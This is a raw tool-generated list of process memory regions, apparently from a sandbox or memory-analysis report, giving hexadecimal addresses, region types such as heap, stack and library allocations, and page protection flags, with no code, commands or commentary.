72C0000
trusted library allocation
page read and write
7FFA5B5D7000
unkown
page readonly
7FF511847000
unkown
page readonly
9FEA000
heap
page read and write
108E6000
heap
page read and write
7FF51148C000
unkown
page readonly
7FFA5BB61000
unkown
page execute read
550000
heap
page read and write
D0AC000
unkown
page readonly
D1A3000
unkown
page readonly
281A1FDA000
heap
page read and write
4910000
heap
page read and write
DE40000
trusted library allocation
page read and write
7FF5119E5000
unkown
page readonly
473A000
unkown
page read and write
5971000
heap
page read and write
85F6000
heap
page read and write
206260D7000
heap
page execute and read and write
7FF9F17A2000
trusted library allocation
page read and write
8571000
heap
page read and write
2EAD000
heap
page read and write
7FF51185A000
unkown
page readonly
FDC678D000
stack
page read and write
472A000
unkown
page read and write
2AEE000
stack
page read and write
12FC83E6000
trusted library allocation
page read and write
EE53000
unkown
page read and write
26AC6AF8000
heap
page read and write
12FE0820000
trusted library allocation
page read and write
A68B000
stack
page read and write
7FFA594E3000
unkown
page read and write
2D63000
trusted library allocation
page read and write
861D000
heap
page read and write
31D0000
heap
page read and write
7FF511820000
unkown
page readonly
9F6D000
heap
page read and write
7FF9F175D000
trusted library allocation
page read and write
7FF5114CC000
unkown
page readonly
281A1FE8000
heap
page read and write
28187460000
heap
page read and write
10B8C000
stack
page read and write
F51F5F7000
stack
page read and write
18D5432E000
heap
page read and write
85E4000
heap
page read and write
12FE01A0000
trusted library allocation
page read and write
F30000
unkown
page read and write
7DF419781000
trusted library allocation
page execute read
DF90000
heap
page read and write
7FF9F18D0000
trusted library allocation
page read and write
5F4D000
stack
page read and write
7FFA5BCFE000
unkown
page read and write
88E1000
unkown
page read and write
83D3000
heap
page read and write
12FE07E0000
trusted library allocation
page read and write
12FE04D0000
trusted library allocation
page read and write
86AB000
heap
page read and write
FCC000
stack
page read and write
7460000
trusted library allocation
page read and write
12FC83F7000
trusted library allocation
page read and write
D59C000
heap
page read and write
2F15000
heap
page read and write
F51F47F000
stack
page read and write
F51F1AB000
stack
page read and write
2060C068000
heap
page read and write
15629429000
heap
page read and write
13D0000
heap
page read and write
7FF5116C5000
unkown
page readonly
26AC1B18000
heap
page read and write
32C0000
unkown
page read and write
C8B6000
stack
page read and write
7FF511912000
unkown
page readonly
A10000
heap
page read and write
BECB000
stack
page read and write
C98A000
stack
page read and write
A0B8000
heap
page read and write
12FE0202000
heap
page read and write
9E87000
heap
page read and write
6089000
heap
page read and write
1E4A95F0000
heap
page read and write
504C000
stack
page read and write
B050000
unkown
page readonly
E58E000
stack
page read and write
1C7C7470000
trusted library allocation
page read and write
4980000
unkown
page readonly
8632000
heap
page read and write
815C000
unkown
page read and write
7FF511855000
unkown
page readonly
1C7C72E9000
heap
page read and write
28238D80000
heap
page read and write
12FE0820000
trusted library allocation
page read and write
2C5F000
trusted library allocation
page execute and read and write
7FF9F1764000
trusted library allocation
page read and write
A15D000
heap
page read and write
9EA4000
heap
page read and write
7FF5117F7000
unkown
page readonly
A1EF000
heap
page read and write
7FF51123B000
unkown
page readonly
4740000
trusted library section
page read and write
9D7F000
stack
page read and write
103A3000
heap
page read and write
A1B4000
heap
page read and write
2F18000
unkown
page read and write
816F000
unkown
page read and write
7FF51131C000
unkown
page readonly
12FE0180000
trusted library allocation
page read and write
108E9000
heap
page read and write
813C000
unkown
page read and write
FDC533E000
stack
page read and write
26AC6A3C000
heap
page read and write
7FF51124D000
unkown
page readonly
10A8A000
heap
page read and write
26AC1013000
heap
page read and write
28238F00000
trusted library allocation
page read and write
D04A000
unkown
page readonly
2060E30D000
trusted library allocation
page read and write
1A54B6E0000
trusted library allocation
page read and write
630000
trusted library allocation
page read and write
7A18000
unkown
page readonly
28251550000
heap
page read and write
7FF9F1810000
trusted library allocation
page read and write
8590000
heap
page read and write
E544000
unkown
page read and write
1A54AD50000
trusted library allocation
page read and write
9F6D000
heap
page read and write
12FE0791000
trusted library allocation
page read and write
5AB0000
trusted library allocation
page read and write
927D000
stack
page read and write
5C15000
unkown
page read and write
9EA8000
heap
page read and write
85F6000
heap
page read and write
2EB0000
unkown
page read and write
7FF9F1870000
trusted library allocation
page read and write
7FF5114E7000
unkown
page readonly
9FC9000
heap
page read and write
E202000
unkown
page read and write
8571000
heap
page read and write
E112000
unkown
page read and write
8188000
unkown
page read and write
60D8000
heap
page read and write
FF89000
heap
page read and write
3460000
heap
page read and write
7FF51174E000
unkown
page readonly
5FD1000
heap
page read and write
28238F00000
trusted library allocation
page read and write
9E52000
heap
page read and write
85F6000
heap
page read and write
12FE08F0000
trusted library allocation
page read and write
12FE0271000
heap
page read and write
8615000
heap
page read and write
86A1000
heap
page read and write
9F7D000
heap
page read and write
9F2E000
heap
page read and write
2E79000
trusted library allocation
page read and write
D574000
heap
page read and write
9EFE000
heap
page read and write
3258000
stack
page read and write
7FF9F15EC000
trusted library allocation
page read and write
E808000
stack
page read and write
8590000
heap
page read and write
A6BB000
stack
page read and write
32B0000
unkown
page readonly
3920000
trusted library allocation
page read and write
3656000
heap
page read and write
4947000
heap
page read and write
26AC6AFB000
heap
page read and write
DD0000
heap
page read and write
7FF5112CD000
unkown
page readonly
839E000
heap
page read and write
85F6000
heap
page read and write
308E000
stack
page read and write
7C65000
unkown
page readonly
8150000
unkown
page read and write
B648000
stack
page read and write
5BDC000
unkown
page read and write
31D2000
heap
page read and write
5900000
heap
page read and write
752A000
system
page read and write
5198000
unkown
page read and write
B949000
stack
page read and write
7FF511A55000
unkown
page readonly
7FFA5B573000
unkown
page readonly
A02E000
heap
page read and write
4978000
stack
page read and write
8586000
heap
page read and write
12FE08D0000
trusted library allocation
page read and write
26AC6880000
trusted library allocation
page read and write
18D541E0000
trusted library allocation
page read and write
12FE0830000
trusted library allocation
page read and write
5852000
heap
page read and write
A193000
heap
page read and write
12FE0180000
trusted library allocation
page read and write
10D8E000
stack
page read and write
85E4000
heap
page read and write
8526000
heap
page read and write
FDC577E000
stack
page read and write
18D542D1000
heap
page read and write
1A55B2B4000
trusted library allocation
page read and write
7460000
trusted library allocation
page read and write
A1DA000
heap
page read and write
83C2000
heap
page read and write
7FF51149F000
unkown
page readonly
1C7AEF40000
trusted library allocation
page read and write
70FB000
stack
page read and write
2810000
trusted library allocation
page read and write
E16F000
unkown
page read and write
2016A102000
heap
page read and write
60D2000
heap
page read and write
855B000
heap
page read and write
FFCE000
heap
page read and write
7ED4000
unkown
page read and write
9E83000
heap
page read and write
7FFA5BCF3000
unkown
page read and write
A1BE000
heap
page read and write
7FF511327000
unkown
page readonly
2016A802000
trusted library allocation
page read and write
815A000
unkown
page read and write
D240000
unkown
page readonly
B4CE000
stack
page read and write
7ECC000
unkown
page read and write
12FC7AB0000
heap
page execute and read and write
8530000
heap
page read and write
11D0000
unkown
page readonly
9BFE000
stack
page read and write
85F2000
heap
page read and write
85D3000
heap
page read and write
E561000
unkown
page read and write
DF8A000
heap
page read and write
93F9000
stack
page read and write
28251770000
trusted library allocation
page read and write
5A4B000
stack
page read and write
2F5D000
unkown
page read and write
B648000
stack
page read and write
DB8000
heap
page read and write
7FF511645000
unkown
page readonly
1A549490000
heap
page read and write
499C000
heap
page read and write
26AC6890000
remote allocation
page read and write
FF9D000
heap
page read and write
9EC4000
heap
page read and write
60F8000
heap
page read and write
837B000
heap
page read and write
60ED000
heap
page read and write
2016A06E000
heap
page read and write
A1CD000
heap
page read and write
A3F89FF000
stack
page read and write
A1CD000
heap
page read and write
30F0000
heap
page read and write
E409000
stack
page read and write
5B90000
unkown
page read and write
5430000
unkown
page readonly
7FF9F1696000
trusted library allocation
page execute and read and write
508B000
stack
page read and write
5909000
heap
page read and write
BE0000
unkown
page read and write
5936000
heap
page read and write
7FF511692000
unkown
page readonly
84E9000
heap
page read and write
9E52000
heap
page read and write
2E91000
unkown
page read and write
A53D000
stack
page read and write
1A563520000
trusted library allocation
page read and write
9EA8000
heap
page read and write
7E40000
unkown
page read and write
7CF5000
unkown
page readonly
26AC1073000
heap
page read and write
E54E000
unkown
page read and write
28238F50000
heap
page execute and read and write
A1D3000
heap
page read and write
7FF9F178C000
trusted library allocation
page read and write
1E4A71DA000
heap
page read and write
3470000
unkown
page read and write
826F000
stack
page read and write
281A1400000
trusted library allocation
page read and write
103B9000
heap
page read and write
7FF5114B7000
unkown
page readonly
2D08000
stack
page read and write
31B9000
heap
page read and write
2060E62B000
trusted library allocation
page read and write
7FF5117B5000
unkown
page readonly
10C8B000
stack
page read and write
7BFE000
unkown
page readonly
1A10D470000
heap
page read and write
8584000
heap
page read and write
85F6000
heap
page read and write
12FC60F0000
trusted library allocation
page read and write
9F6F000
heap
page read and write
7FF5114CC000
unkown
page readonly
18D55020000
trusted library allocation
page read and write
8615000
heap
page read and write
110A000
heap
page read and write
FFE1000
heap
page read and write
7FF511850000
unkown
page readonly
7EBC000
unkown
page read and write
DC8A000
stack
page read and write
1C7C7450000
trusted library allocation
page read and write
85F6000
heap
page read and write
D40B000
system
page execute and read and write
E58E000
stack
page read and write
12FC6100000
heap
page readonly
F34000
heap
page read and write
1A563520000
trusted library allocation
page read and write
5487000
stack
page read and write
603F000
heap
page read and write
7FF51198E000
unkown
page readonly
9A75000
stack
page read and write
A091000
heap
page read and write
CE68000
unkown
page readonly
B3CA000
stack
page read and write
28251780000
trusted library allocation
page read and write
7FF5119AC000
unkown
page readonly
7ED8000
unkown
page read and write
98FD000
stack
page read and write
1039B000
heap
page read and write
85E4000
heap
page read and write
8044000
unkown
page read and write
A62BE7F000
stack
page read and write
A408000
stack
page read and write
7FF9F1870000
trusted library allocation
page read and write
85CF000
heap
page read and write
723FFFE000
stack
page read and write
1A54AD70000
trusted library allocation
page read and write
1460000
trusted library allocation
page read and write
CF24000
unkown
page readonly
7FF9F1870000
trusted library allocation
page read and write
8590000
heap
page read and write
7FF9F1754000
trusted library allocation
page read and write
A02A000
heap
page read and write
20626210000
trusted library allocation
page read and write
8335000
heap
page read and write
7FF9F1900000
trusted library allocation
page read and write
7FF9F17F0000
trusted library allocation
page read and write
589C000
heap
page read and write
E526000
unkown
page read and write
E10B000
unkown
page read and write
A1DA000
heap
page read and write
1A5494C3000
heap
page read and write
18D54335000
heap
page read and write
1A55B260000
trusted library allocation
page read and write
311C000
heap
page read and write
1039D000
heap
page read and write
3931000
trusted library allocation
page read and write
A066000
heap
page read and write
15629452000
heap
page read and write
471A000
unkown
page read and write
49A3000
heap
page read and write
A1EA000
heap
page read and write
A0D7000
heap
page read and write
D13C000
unkown
page readonly
7FF9F1660000
trusted library allocation
page read and write
26AC6A18000
heap
page read and write
7FFA5B3D0000
unkown
page readonly
7FF9F1650000
trusted library allocation
page read and write
2060C152000
heap
page read and write
A0A3000
heap
page read and write
5962000
heap
page read and write
EA6000
heap
page read and write
26AC6730000
trusted library allocation
page read and write
8171000
unkown
page read and write
7EB7000
unkown
page read and write
12FC5F9A000
heap
page read and write
8166000
unkown
page read and write
26AC1076000
heap
page read and write
4730000
trusted library section
page read and write
E1F1000
unkown
page read and write
7DF419791000
trusted library allocation
page execute read
26D1C7D000
stack
page read and write
7FF511464000
unkown
page readonly
7DF45EE40000
trusted library allocation
page readonly
AC5000
stack
page read and write
7FF511617000
unkown
page readonly
A15B000
heap
page read and write
7FFA59350000
unkown
page readonly
1A10D3CC000
heap
page read and write
7FF511320000
unkown
page readonly
3470000
unkown
page read and write
7340000
trusted library allocation
page read and write
26AC1B59000
heap
page read and write
8584000
heap
page read and write
A193000
heap
page read and write
7FED000
stack
page read and write
28251800000
trusted library allocation
page read and write
7FF5114F0000
unkown
page readonly
7FF9F1900000
trusted library allocation
page read and write
A1F7000
heap
page read and write
18D54339000
heap
page read and write
8521000
heap
page read and write
282389E0000
trusted library allocation
page read and write
84A9000
heap
page read and write
7FF9F1820000
trusted library allocation
page read and write
8391000
heap
page read and write
28237295000
heap
page read and write
609A000
heap
page read and write
7FF9F18E0000
trusted library allocation
page read and write
7EBC000
unkown
page read and write
596D000
heap
page read and write
85E9000
heap
page read and write
301F000
trusted library allocation
page read and write
28236FBF000
heap
page read and write
12FE01B0000
trusted library allocation
page read and write
589C000
heap
page read and write
5F94000
heap
page read and write
9AFA000
stack
page read and write
9CFB000
stack
page read and write
1020000
heap
page read and write
A1DA000
heap
page read and write
7FF511574000
unkown
page readonly
7CA3000
unkown
page readonly
CF18000
unkown
page readonly
7FFA594EA000
unkown
page read and write
CE9F000
unkown
page readonly
154FA7E000
stack
page read and write
CF5F000
unkown
page readonly
58BB000
heap
page read and write
C8B6000
stack
page read and write
B949000
stack
page read and write
CFD4000
unkown
page readonly
28251790000
trusted library allocation
page read and write
7F91000
unkown
page read and write
1C7AFC6C000
trusted library allocation
page read and write
12FE0810000
trusted library allocation
page read and write
CEAF000
unkown
page readonly
F34000
heap
page read and write
7FF5118A9000
unkown
page readonly
28251840000
trusted library allocation
page read and write
8590000
heap
page read and write
867D000
heap
page read and write
7FF5115EA000
unkown
page readonly
4740000
trusted library section
page read and write
D00000
remote allocation
page read and write
7ED0000
unkown
page read and write
F34000
heap
page read and write
7FF51156E000
unkown
page readonly
12FC6140000
trusted library allocation
page read and write
9EA4000
heap
page read and write
58CA000
heap
page read and write
1C7C7460000
trusted library allocation
page read and write
138B000
heap
page read and write
7FF51163D000
unkown
page readonly
5978000
heap
page read and write
85C9000
heap
page read and write
1128F000
stack
page read and write
865F000
heap
page read and write
7A18000
unkown
page readonly
9BFE000
stack
page read and write
81EF000
stack
page read and write
12FE07D0000
trusted library allocation
page read and write
49C6000
unkown
page read and write
A187000
heap
page read and write
60FC000
stack
page read and write
FF27000
heap
page read and write
7FF9F18D0000
trusted library allocation
page read and write
D8BC000
stack
page read and write
3030000
unkown
page read and write
31D0000
heap
page read and write
4D50000
unkown
page read and write
5F7D000
heap
page read and write
9F75000
heap
page read and write
18D54339000
heap
page read and write
1A54B75F000
trusted library allocation
page read and write
2C5B000
trusted library allocation
page execute and read and write
D145000
unkown
page readonly
2CCE0FD000
stack
page read and write
D240000
unkown
page readonly
6045000
heap
page read and write
EB0000
trusted library allocation
page execute and read and write
D0FE000
unkown
page readonly
310B000
stack
page read and write
1A10D0B4000
heap
page read and write
2F85000
unkown
page read and write
8693000
heap
page read and write
5C9F000
unkown
page read and write
9CFB000
stack
page read and write
9EB3000
heap
page read and write
18D54310000
heap
page read and write
7FFA5B3D1000
unkown
page execute read
58CA000
heap
page read and write
12FE0209000
heap
page read and write
E51B000
stack
page read and write
7FF5051D1000
unkown
page readonly
DF41000
heap
page read and write
7FF9F17B9000
trusted library allocation
page read and write
4870000
trusted library allocation
page read and write
48E0000
unkown
page read and write
83B5000
heap
page read and write
28251071000
trusted library allocation
page read and write
FF20000
heap
page read and write
A097000
heap
page read and write
7FF9F15C3000
trusted library allocation
page read and write
4B23000
heap
page read and write
2820000
unkown
page readonly
7FF9F1857000
trusted library allocation
page read and write
A0A5000
heap
page read and write
7D47000
unkown
page readonly
6A2E000
stack
page read and write
D4D0000
trusted library allocation
page read and write
1494000
heap
page read and write
8530000
heap
page read and write
9F69000
heap
page read and write
4F9E000
stack
page read and write
3120000
heap
page read and write
FFDC000
heap
page read and write
834F000
heap
page read and write
5C01000
unkown
page read and write
E70E000
stack
page read and write
7FF5115B5000
unkown
page readonly
A1BE000
heap
page read and write
1140E000
stack
page read and write
20626210000
trusted library allocation
page read and write
817E000
unkown
page read and write
28239171000
trusted library allocation
page read and write
A0A6000
heap
page read and write
D59C000
heap
page read and write
12FE01B0000
trusted library allocation
page read and write
1A10D08F000
heap
page read and write
7FF51196C000
unkown
page readonly
7583000
unkown
page readonly
584D000
heap
page read and write
3A40000
heap
page read and write
7FF9F15C4000
trusted library allocation
page read and write
8615000
heap
page read and write
A118000
heap
page read and write
585A000
heap
page read and write
7FF9F15D0000
trusted library allocation
page read and write
2060DA40000
heap
page execute and read and write
81AB000
unkown
page read and write
5BCE000
unkown
page read and write
28251790000
trusted library allocation
page read and write
E1EC000
unkown
page read and write
1039E000
heap
page read and write
9EA4000
heap
page read and write
103C6000
heap
page read and write
EE7000
heap
page read and write
2ECC000
heap
page read and write
9FAF000
heap
page read and write
69A7000
unkown
page read and write
9ED1000
heap
page read and write
12FE04C0000
trusted library allocation
page read and write
7BAC000
unkown
page readonly
D83B000
stack
page read and write
60AF000
heap
page read and write
2F80000
heap
page read and write
28238F61000
trusted library allocation
page read and write
816A000
unkown
page read and write
A199000
heap
page read and write
1A54B2E1000
trusted library allocation
page read and write
10A8A000
heap
page read and write
12FE0180000
trusted library allocation
page read and write
BE4F000
stack
page read and write
9F34000
heap
page read and write
7FFA5BD67000
unkown
page readonly
9C5000
stack
page read and write
28251890000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
437217E000
stack
page read and write
7FF511A2F000
unkown
page readonly
1040000
unkown
page read and write
520E000
stack
page read and write
5B90000
unkown
page read and write
7D2C000
unkown
page readonly
4BE8000
stack
page read and write
FFDF000
heap
page read and write
5FC2000
heap
page read and write
3137000
heap
page read and write
7FF511492000
unkown
page readonly
4740000
trusted library allocation
page execute and read and write
7FF511308000
unkown
page readonly
28251107000
heap
page execute and read and write
7480000
trusted library allocation
page read and write
7FF511248000
unkown
page readonly
5BA1000
unkown
page read and write
BE0000
unkown
page read and write
28251080000
trusted library allocation
page read and write
1A10B098000
heap
page read and write
E6EE000
unkown
page read and write
EE9B000
unkown
page read and write
281A12C7000
heap
page execute and read and write
4D50000
unkown
page readonly
11D0000
unkown
page readonly
7FF5114C9000
unkown
page readonly
A042000
heap
page read and write
58B3000
heap
page read and write
CF5F000
unkown
page readonly
1330000
trusted library allocation
page read and write
2060E32A000
trusted library allocation
page read and write
8164000
unkown
page read and write
A1DA000
heap
page read and write
3460000
heap
page read and write
7E40000
unkown
page read and write
85DB000
heap
page read and write
EDD2000
unkown
page read and write
7FF511912000
unkown
page readonly
6100000
unkown
page read and write
7FF511968000
unkown
page readonly
9BFE000
stack
page read and write
E1A9000
unkown
page read and write
A1D7000
heap
page read and write
12FC5F72000
heap
page read and write
D70000
heap
page read and write
7FF51195E000
unkown
page readonly
7FF511557000
unkown
page readonly
28251100000
heap
page execute and read and write
A037000
heap
page read and write
86AB000
heap
page read and write
154F7EF000
stack
page read and write
2F42000
unkown
page read and write
26D1B7F000
stack
page read and write
997B000
stack
page read and write
28251061000
trusted library allocation
page read and write
281890B1000
trusted library allocation
page read and write
103A3000
heap
page read and write
FF20000
heap
page read and write
5F59000
heap
page read and write
54F4000
stack
page read and write
7AE2000
unkown
page readonly
10A80000
heap
page read and write
206260C0000
trusted library allocation
page read and write
2EAD000
heap
page read and write
7FFA5BD1A000
unkown
page readonly
7FF51166F000
unkown
page readonly
7FF51174E000
unkown
page readonly
7BD5000
unkown
page readonly
281A12B0000
trusted library allocation
page read and write
5FC2000
heap
page read and write
4F0C000
stack
page read and write
5BA1000
unkown
page read and write
49C6000
unkown
page read and write
2060C11C000
heap
page read and write
2339506E000
heap
page read and write
1C7AD180000
heap
page read and write
84AA000
heap
page read and write
1A563378000
heap
page read and write
7FF9F1770000
trusted library allocation
page execute and read and write
A096000
heap
page read and write
1C7AFC74000
trusted library allocation
page read and write
FDC56FD000
stack
page read and write
7FF5119F8000
unkown
page readonly
10BE000
stack
page read and write
DF47000
heap
page read and write
5D4E000
stack
page read and write
A179000
heap
page read and write
15629513000
heap
page read and write
7490000
heap
page readonly
7FF5119CA000
unkown
page readonly
2F5D000
unkown
page read and write
282510A0000
trusted library allocation
page read and write
7FF511674000
unkown
page readonly
B6CE000
stack
page read and write
85CD000
heap
page read and write
46F0000
unkown
page read and write
2060BF70000
unkown
page readonly
154FE39000
stack
page read and write
5F92000
heap
page read and write
7FF9F1782000
trusted library allocation
page read and write
596E000
heap
page read and write
4FE0000
heap
page read and write
12FE026E000
heap
page read and write
7FF511AB6000
unkown
page readonly
4AFC000
stack
page read and write
CA38000
stack
page read and write
7FFA5B573000
unkown
page readonly
7FF5119F8000
unkown
page readonly
318E000
stack
page read and write
69B9000
unkown
page read and write
9F3B000
heap
page read and write
85A2000
heap
page read and write
49A5000
heap
page read and write
28251090000
trusted library allocation
page read and write
463E6FF000
stack
page read and write
7FF5118D4000
unkown
page readonly
1C7AFC7D000
trusted library allocation
page read and write
12FC8389000
trusted library allocation
page read and write
206260A4000
heap
page read and write
2060E5C8000
trusted library allocation
page read and write
7FF511285000
unkown
page readonly
5F66000
heap
page read and write
51A0000
unkown
page read and write
15629502000
heap
page read and write
BF0000
unkown
page readonly
E6E9000
unkown
page read and write
7FF511ABD000
unkown
page readonly
A1CE000
heap
page read and write
1E4A7400000
heap
page read and write
FF93000
heap
page read and write
B849000
stack
page read and write
7FFA5B565000
unkown
page read and write
811E000
unkown
page read and write
2F80000
heap
page read and write
7FF511295000
unkown
page readonly
2F80000
heap
page read and write
81B0000
unkown
page read and write
7FF5114B7000
unkown
page readonly
E10F000
stack
page read and write
D113000
unkown
page readonly
8517000
heap
page read and write
8963000
unkown
page read and write
7FF511855000
unkown
page readonly
28239437000
trusted library allocation
page read and write
7FF511820000
unkown
page readonly
7FF51124D000
unkown
page readonly
8697000
heap
page read and write
A0C4000
heap
page read and write
10C0F000
stack
page read and write
7D40000
unkown
page readonly
7FF9F1676000
trusted library allocation
page read and write
1C7AEB40000
trusted library allocation
page read and write
7FF9F1810000
trusted library allocation
page read and write
9FB7000
heap
page read and write
85F6000
heap
page read and write
A1F7000
heap
page read and write
D240000
unkown
page readonly
8538000
heap
page read and write
318C000
stack
page read and write
F51F8FF000
stack
page read and write
7FF9F15D4000
trusted library allocation
page read and write
7C13000
unkown
page readonly
7FF51196F000
unkown
page readonly
12FD7F45000
trusted library allocation
page read and write
5580000
unkown
page read and write
9F73000
heap
page read and write
F11000
heap
page read and write
E21B000
stack
page read and write
1A563500000
trusted library allocation
page read and write
5F20000
heap
page read and write
8403000
heap
page read and write
C990000
unkown
page readonly
28189558000
trusted library allocation
page read and write
282517A2000
trusted library allocation
page read and write
5BCF000
unkown
page read and write
87BD000
stack
page read and write
10C8B000
stack
page read and write
2DD0000
stack
page read and write
57D0000
heap
page read and write
596E000
heap
page read and write
723F8FE000
stack
page read and write
2811000
heap
page read and write
9EB5000
heap
page read and write
281A12B0000
trusted library allocation
page read and write
CA38000
stack
page read and write
5F5C000
heap
page read and write
7FF5112CD000
unkown
page readonly
4700000
unkown
page read and write
4740000
trusted library section
page read and write
A20000
unkown
page read and write
7FF9F18A0000
trusted library allocation
page read and write
32F3000
unkown
page readonly
A17A000
heap
page read and write
D4D0000
trusted library allocation
page read and write
2F9F000
unkown
page read and write
A0C7000
heap
page read and write
D0B5000
unkown
page readonly
88F7000
system
page read and write
A059000
heap
page read and write
4CCA000
stack
page read and write
870A000
stack
page read and write
6078000
heap
page read and write
B8CA000
stack
page read and write
26AC6A2B000
heap
page read and write
5F59000
heap
page read and write
C73A000
stack
page read and write
318C000
stack
page read and write
2F3C000
heap
page read and write
7FF5118AF000
unkown
page readonly
D70000
heap
page read and write
E8A5000
unkown
page read and write
28236F4F000
heap
page read and write
7FF9F1784000
trusted library allocation
page read and write
5B78000
stack
page read and write
7FF51154B000
unkown
page readonly
85F2000
heap
page read and write
D13C000
unkown
page readonly
12FE07D0000
trusted library allocation
page read and write
1C7AD1EA000
heap
page read and write
85F6000
heap
page read and write
DE7000
heap
page read and write
12FE04D0000
trusted library allocation
page read and write
8173000
unkown
page read and write
5CC6000
stack
page read and write
7D33000
unkown
page readonly
26AC103F000
heap
page read and write
5D2F000
unkown
page read and write
26AC6A17000
heap
page read and write
7FF511645000
unkown
page readonly
9CFB000
stack
page read and write
CE7E000
unkown
page readonly
1A563521000
trusted library allocation
page read and write
2ECC000
heap
page read and write
3285000
stack
page read and write
2FA3000
unkown
page read and write
1C7AF0D4000
trusted library allocation
page read and write
85BA000
heap
page read and write
604B000
heap
page read and write
5F41000
heap
page read and write
7FF9F17F0000
trusted library allocation
page read and write
D255000
unkown
page readonly
3193000
heap
page read and write
E7C8000
unkown
page read and write
2FA3000
unkown
page read and write
5430000
unkown
page readonly
8631000
heap
page read and write
7460000
heap
page read and write
A168000
heap
page read and write
7DF527E20000
unkown
page readonly
7FFA5BCFC000
unkown
page read and write
8068000
stack
page read and write
A193000
heap
page read and write
5962000
heap
page read and write
9F04000
heap
page read and write
2ECC000
heap
page read and write
1168C000
stack
page read and write
7FF9F18F0000
trusted library allocation
page read and write
8177000
unkown
page read and write
28250F60000
heap
page read and write
D3BA000
stack
page read and write
EC4A000
heap
page read and write
10390000
heap
page read and write
28187365000
heap
page read and write
2F82000
heap
page read and write
9F06000
heap
page read and write
7FF5116B1000
unkown
page readonly
1A10D0B4000
heap
page read and write
E121000
unkown
page read and write
74C3000
trusted library allocation
page read and write
2ECC000
heap
page read and write
2016A056000
heap
page read and write
756E000
unkown
page readonly
4780000
unkown
page read and write
8B3A13D000
stack
page read and write
6EF5000
stack
page read and write
7FF9F1837000
trusted library allocation
page read and write
E6EC000
unkown
page read and write
12FE07E0000
trusted library allocation
page read and write
1A54B36E000
trusted library allocation
page read and write
156293D0000
trusted library allocation
page read and write
281A1FBF000
heap
page read and write
2EAD000
heap
page read and write
27E30266000
heap
page read and write
9FF9000
heap
page read and write
8602000
heap
page read and write
26D1CFF000
stack
page read and write
3070000
unkown
page read and write
5F59000
heap
page read and write
6130000
heap
page read and write
5977000
heap
page read and write
8317000
heap
page read and write
4D97000
unclassified section
page read and write
DF79000
heap
page read and write
5196000
unkown
page read and write
281A2015000
heap
page read and write
A63B000
stack
page read and write
12FE01A0000
trusted library allocation
page read and write
7FFA594E5000
unkown
page read and write
9F6B000
heap
page read and write
2F64000
unkown
page read and write
18D54312000
heap
page read and write
7FF9F16B6000
trusted library allocation
page execute and read and write
9F79000
heap
page read and write
FE0000
unkown
page readonly
A187000
heap
page read and write
18D5433B000
heap
page read and write
9F63000
heap
page read and write
E666000
unkown
page read and write
8150000
unkown
page read and write
7195000
heap
page read and write
FDC567F000
stack
page read and write
7FF51188A000
unkown
page readonly
2F64000
unkown
page read and write
335E000
stack
page read and write
603F000
heap
page read and write
18D542B9000
heap
page read and write
7E3F000
stack
page read and write
7A69000
stack
page read and write
33A0000
unkown
page readonly
8044000
unkown
page read and write
48E0000
unkown
page read and write
863A000
heap
page read and write
49BB000
heap
page read and write
7FF51124D000
unkown
page readonly
103A9000
heap
page read and write
281A202C000
heap
page read and write
7FF51131E000
unkown
page readonly
4DDACEB000
stack
page read and write
B349000
stack
page read and write
7FF51131C000
unkown
page readonly
320A000
stack
page read and write
281A202E000
heap
page read and write
7FF9F1867000
trusted library allocation
page read and write
8175000
unkown
page read and write
7FF9F1746000
trusted library allocation
page read and write
BFCE000
stack
page read and write
596E000
heap
page read and write
8720000
unkown
page readonly
26AC6620000
trusted library allocation
page read and write
3A46000
heap
page read and write
5C67000
unkown
page read and write
12FD8097000
trusted library allocation
page read and write
5F8A000
heap
page read and write
86A8000
heap
page read and write
E194000
unkown
page read and write
463EB37000
stack
page read and write
8633000
heap
page read and write
E16E000
unkown
page read and write
103A9000
heap
page read and write
20626031000
heap
page read and write
7FF9F17B2000
trusted library allocation
page read and write
E841000
unkown
page read and write
8171000
unkown
page read and write
2CCE47D000
stack
page read and write
D08C000
unkown
page readonly
B14B000
stack
page read and write
3655000
heap
page read and write
282517F0000
trusted library allocation
page read and write
7460000
heap
page read and write
CF2E000
unkown
page readonly
308A000
stack
page read and write
A1C2000
heap
page read and write
7FF9F15D3000
trusted library allocation
page read and write
9ED1000
heap
page read and write
308A000
stack
page read and write
DF6A000
heap
page read and write
28238F10000
trusted library allocation
page read and write
A1EA000
heap
page read and write
A080000
heap
page read and write
2E0A000
stack
page read and write
D490000
trusted library allocation
page read and write
E788000
stack
page read and write
7FFA5B570000
unkown
page read and write
10A8A000
heap
page read and write
2F12000
heap
page read and write
7FF511308000
unkown
page readonly
7FF9F15D4000
trusted library allocation
page read and write
58FE000
heap
page read and write
5C49000
unkown
page read and write
4A50000
heap
page read and write
A01B000
heap
page read and write
12FE0180000
trusted library allocation
page read and write
A1F7000
heap
page read and write
4FC0000
trusted library allocation
page read and write
26AC6730000
trusted library allocation
page read and write
28251830000
trusted library allocation
page read and write
EA0000
heap
page read and write
1C7AD19A000
heap
page read and write
1C7AFFAB000
trusted library allocation
page read and write
756B000
unkown
page readonly
DF8A000
heap
page read and write
1C7AFCCE000
trusted library allocation
page read and write
E16F000
unkown
page read and write
8602000
heap
page read and write
2F36000
heap
page read and write
49A0000
unkown
page read and write
93F9000
stack
page read and write
12FE01F4000
heap
page read and write
7FF5118E1000
unkown
page readonly
9FC9000
heap
page read and write
A5BE000
stack
page read and write
A149000
heap
page read and write
A089000
heap
page read and write
27E30200000
unkown
page read and write
7FF9F1686000
trusted library allocation
page read and write
81DB000
unkown
page read and write
48B0000
unkown
page read and write
947D000
stack
page read and write
7A47000
unkown
page readonly
832A000
heap
page read and write
CA40000
unkown
page readonly
88E1000
unkown
page read and write
7FF511A28000
unkown
page readonly
2D8E000
stack
page read and write
26D17CF000
stack
page read and write
E538000
unkown
page read and write
8696000
heap
page read and write
4F08000
stack
page read and write
7FF511310000
unkown
page readonly
7FF9F16B6000
trusted library allocation
page execute and read and write
7FF511788000
unkown
page readonly
7323000
trusted library allocation
page read and write
31BF000
trusted library allocation
page execute and read and write
5C82000
unkown
page read and write
485B000
trusted library allocation
page execute and read and write
51C8000
unkown
page read and write
2F27000
unkown
page read and write
69B5000
unkown
page read and write
1025000
heap
page read and write
9E9D000
heap
page read and write
72E0000
heap
page readonly
7FFA5B56E000
unkown
page read and write
B04B000
stack
page read and write
28189131000
trusted library allocation
page read and write
85F0000
heap
page read and write
154FD3F000
stack
page read and write
4980000
unkown
page readonly
8963000
unkown
page read and write
7FF5118C7000
unkown
page readonly
7FE1000
unkown
